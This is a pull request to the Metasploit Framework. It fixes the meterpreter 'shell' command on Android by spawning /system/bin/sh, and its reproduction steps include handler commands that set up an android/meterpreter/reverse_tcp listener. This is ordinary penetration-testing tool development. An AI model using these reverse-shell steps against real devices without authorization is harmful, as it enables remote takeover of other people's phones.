### PR TITLE
fix #11975, fix meterpreter shell command on android

### DIFF
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb
@@ -314,6 +314,8 @@ class Console::CommandDispatcher::Stdapi::Sys
         print_error('Failed to spawn shell with thread impersonation. Retrying without it.')
         cmd_execute('-f', path, '-c', '-i', '-H')
       end
+    when 'android'
+      cmd_execute('-f', '/system/bin/sh', '-c', '-i')
     when 'linux', 'osx'
       if use_pty && pty_shell(sh_path)
         return true


### PR DESCRIPTION
This was due to https://github.com/rapid7/metasploit-framework/commit/53557cc92e7f222559267c2f4f384348a9619631#diff-b140b9ed40fbd717d5786d0ee125c7efL327


## Steps to reproduce
1) I am using metasploit-framework 5.0.28-dev and the reverse_tcp payload 
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 10.0.0.1
set LPORT 7080
exploit -j -z

2) Asap Meterpreter session has been established I execute command "shell" and get following error
Before fix:
meterpreter > shell
**[-] stdapi_sys_config_getenv: Operation failed: 1**

After fix:
```
meterpreter > shell
Process 1 created.
Channel 1 created.
echo lol
lol
```

Thoughts:
1. I will also implement the getenv command on Android, but the extra call seems unnecessary given we know it will always be /system/bin/sh.
2. I wonder if we can have a pty shell somehow
3. Do we think it's worth removing (or moving to verbose) the Process 1 created, Channel 1 created. logs?